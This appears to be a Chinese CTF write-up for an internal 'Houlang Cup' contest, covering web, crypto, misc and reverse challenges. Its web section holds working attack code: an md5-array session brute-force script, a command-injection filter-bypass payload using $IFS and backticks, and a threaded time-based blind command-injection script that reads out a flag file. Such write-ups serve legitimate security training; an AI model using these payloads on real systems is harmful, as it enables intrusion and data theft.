CTF“后浪杯”Ginkgo内部考核Write Up

WEB

0X01 爆破

题目源码:

<?php
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
    $_SESSION['nums'] = 0;
    $_SESSION['time'] = time();
    $_SESSION['whoami'] = 'ea';
}

if($_SESSION['time']+120<time()){
    session_destroy();
}

$value = $_REQUEST['value'];
$str_rand = range('a', 'z');
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];

if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
    $_SESSION['nums']++;
    $_SESSION['whoami'] = $str_rands;
    echo $str_rands;
}

if($_SESSION['nums']>=10){
    echo $flag;
}

show_source(__FILE__);
?>

题目意思就是一开始nums为0,接收的value变量,要满足value数组的前两个数和whoaimi变量相同并且md5加密后的value变量为0(这个可以用MD5无法处理数组的漏洞)

也就是第一次,传入变量?value[]=ea,因此value[0]=ea 与whoami想等,所以nums++ (如果value[]=ea&value=es的话,value[0].value[1]=eaes)

然后随意A-Z+A-Z,写个脚本,把显示出来的两个随机衣服在value[]=xx传值进去,直到输出flag (千万注意带 session,保持一个回话)

上脚本:

import requests
url='http://47.102.141.139:28079/'
session=requests.Session()
html=session.get(url+'?value[]=ea').text
for i in range(10):
    html=session.get(url+'?value[]='+ html[0:2]).text
print(html)

0x02 command???

打开题目,意思是用ip传参,提示flag在flag.php,题目又是command,毫无疑问RCE,和GXYCTF2019一道web一样
过滤代码:

|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);

内联执行绕过payload:

cat$IFS$1`ls`

0x03 奔涌吧后浪

打开题目没什么线索,看源码,vim,试试/.index.php.swp,用vim -r恢复源码

%title插图%num

源码:

<html>
<head>
<title>blind cmd exec</title>
<meta language='utf-8' editor='vim'>
</head>
</body>
<img src=pic.gif>
<?php
/*
flag in flag233.php
*/
 function check($number)
{
        $one = ord('1');
        $nine = ord('9');
        for ($i = 0; $i < strlen($number); $i++)
        {
                $digit = ord($number{$i});
                if ( ($digit >= $one) && ($digit <= $nine) )
                {
                        return false;
                }
        }
           return $number == '11259375';
}
if(isset($_GET[sign])&& check($_GET[sign])){
        setcookie('auth','tcp tunnel is forbidden!');
        if(isset($_POST['cmd'])){
                $command=$_POST[cmd];
                $result=exec($command);
                //echo $result;
        }
}else{
        die('no sign');
}
?>
</body>
</html>

要执行 exec($command) 需要有一个GET参数传进来,应该是传一个sign,而且sign要满足上述代码中的check()函数,可以用 11259375 的16进制绕过

?sign=0xabcdef

网上脚本是python2的,这里贴个python3盲注脚本:

import requests,string,threading

def getLength(url,payload):
    data = {}
    length = 0
    for i in range(200):
        data['cmd']="a=$(%s);b=${#a};if test $b -eq %d;then sleep 3;fi"%(payload,i)
        try:
            r = requests.post(url,data=data,timeout=3)
        except:
            length = i
            print ("the string length is {}".format(length))
            break
    return length

def getString(url,payload):
    global length,lock,curId,key
    data = {}
    words = string.ascii_uppercase+string.ascii_lowercase+string.digits+'/=+'
    i = 0
    while True:
        lock.acquire()
        if curId == length:
            lock.release()
            break
        i = curId
        curId += 1
        lock.release()
        for j in words:
            data['cmd']="a=$({});b=`expr substr $a {} 1`;if test $b = '{}';then sleep 8;fi".format(payload,i+1,j)
            try:
                r = requests.post(url,data=data,timeout=8)
            except:
                key[i] = j
                lock.acquire()
                print (''.join(key))
                lock.release()
                break

url = 'http://118.89.227.105:5000/?sign=0xabcdef'
payload = "base64 flag233.php -w 0" 
length = getLength(url,payload)
lock = threading.Lock()
curId = 0 #max(curId) = length - 1
key = ['?' for i in range(length)]

th=[]
for i in range(10):
    t = threading.Thread(target=getString,args=(url,payload))
    th.append(t)
for t in th:
    t.start()  
for t in th:
    t.join()

CRYPTO

0x01 warmup

R1EzREVNWlZHTVpVR05KWkdVWkRLUUpXR0VaRUNNWlFHWkFUR1FaV0lFM1RDTkpZR1JEREdPSlRJSVpUQ05TQ0dSQ0RPUkJUR01aRUlOU0VHTTNETVJSVElNMkRHTkNH

base64-base32-base16-base92

0x02 佛曰

夷殿般須兜我莊阿殿亦殿彌婆若菩須咒我阿斯祗如嘇眾殿般殿菩慧尊般尊囉斯色耨阿耨慧宣咒嚤菩降降即殿叻囉我劫吽殿降隸蜜諦薩夷宣色願空喼嚤嚤降諦婆殿尊嚩嚩叻斯婆宣殿慧殿陀斯殿嘚殿斯訶叻願訶菩阿修嚤殿喼是心莊願嚩咤彌慧心我所咤諸婆愍菩缽僧叻殿諸殿祗聞若般阿尊眾諦嘚蜜嚴即若慧蜜蜜喼吶莊劫般嘚嚤婆喃諦若殿如嚴囉殿阿我慧嘚蜜婆愍

新约佛论禅先佛曰再熊曰

0x03 babyRSA

直接上脚本:

import gmpy2
import binascii

n = 966808932627497190635859236054960349099463975227350564265384373280336699853387254070662881265937565163000758606154308757944030571837175048514574473061401566330836334647176655282619268592560172726526643074499534129878217409046045533656897050117438496357231575999185527675071002803951800635220029015932007465117818739948903750200830856115668691007706836952244842719419452946259275251773298338162389930518838272704908887016474007051397194588396039111216708866214614779627566959335170676055025850932631053641576566165694121420546081043285806783239296799795655191121966377590175780618944910532816988143056757054052679968538901460893571204904394975714081055455240523895653305315517745729334114549756695334171142876080477105070409544777981602152762154610738540163796164295222810243309051503090866674634440359226192530724635477051576515179864461174911975667162597286769079380660782647952944808596310476973939156187472076952935728249061137481887589103973591082872988641958270285169650803792395556363304056290077801453980822097583574309682935697260204862756923865556397686696854239564541407185709940107806536773160263764483443859425726953142964148216209968437587044617613518058779287167853349364533716458676066734216877566181514607693882375533
# p 和 q通过在线网站http://factordb.com/index.php分解
p = gmpy2.mpz(31093551302922880999883020803665536616272147022877428745314830867519351013248914244880101094365815998050115415308439610066700139164376274980650005150267949853671653233491784289493988946869396093730966325659249796545878080119206283512342980854475734097108975670778836003822789405498941374798016753689377992355122774401780930185598458240894362246194248623911382284169677595864501475308194644140602272961699230282993020507668939980205079239221924230430230318076991507619960330144745307022538024878444458717587446601559546292026245318907293584609320115374632235270795633933755350928537598242214216674496409625928797450473)
q = gmpy2.mpz(31093551302922880999883020803665536616272147022877428745314830867519351013248914244880101094365815998050115415308439610066700139164376274980650005150267949853671653233491784289493988946869396093730966325659249796545878080119206283512342980854475734097108975670778836003822789405498941374798016753689377992355122774401780930185598458240894362246194248623911382284169677595864501475308194644140602272961699230282993020507668939980205079239221924230430230318076991507619960330144745307022538024878444458717587446601559546292026245318907293584609320115374632235270795633933755350928537598242214216674496409625928997877221)
e = gmpy2.mpz(65537)
phi_n = (p-1)*(q-1)
d = gmpy2.invert(e, phi_n)
c = gmpy2.mpz(168502910088858295634315070244377409556567637139736308082186369003227771936407321783557795624279162162305200436446903976385948677897665466290852769877562167487142385308027341639816401055081820497002018908896202860342391029082581621987305533097386652183849657065952062433988387640990383623264405525144003500286531262674315900537001845043225363148359766771033899680111076181672797077410584747509581932045540801777738548872747597899965366950827505529432483779821158152928899947837196391555666165486441878183288008753561108995715961920472927844877569855940505148843530998878113722830427807926679324241141182238903567682042410145345551889442158895157875798990903715105782682083886461661307063583447696168828687126956147955886493383805513557604179029050981678755054945607866353195793654108403939242723861651919152369923904002966873994811826391080318146260416978499377182540684409790357257490816203138499369634490897553227763563553981246891677613446390134477832143175248992161641698011195968792105201847976082322786623390242470226740685822218140263182024226228692159380557661591633072091945077334191987860262448385123599459647228562137369178069072804498049463136233856337817385977990145571042231795332995523988174895432819872832170029690848)

m = pow(c, d, n)
print("十进制:\n%s"%m)
m_hex = hex(m)[2:]
print("十六进制:\n%s"%(m_hex,))
#print("ascII:\n%s"%((binascii.b2a_hex(hex(m)[2:])).decode('hex'),))
print("ascii:\n%s"%(binascii.a2b_hex(m_hex).decode("utf8"),))

MISC

0x01 真签到

给了个一直切换的gif动图,开个微信截图

%title插图%num

0x02 宝可梦二代

怀旧经典游戏,下个gba模拟器打开,flag在103道路

0x03 流量分析

附件给了sslkeylog.log,把HTTPS.pcapng文件拖进wireshark
首选项-配置,找到ssl,导入sslkeylog.log,会出来http协议的包,找一下

%title插图%num

REVERSE

0x01 BabyRe

%title插图%num

16进制转字符串
%title插图%num

0x02 HelloCTF

拖进IDA,F5

%title插图%num

将字符串转换为十六进制
%title插图%num

0x03 insanity

文本方式打开搜flag

%title插图%num

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇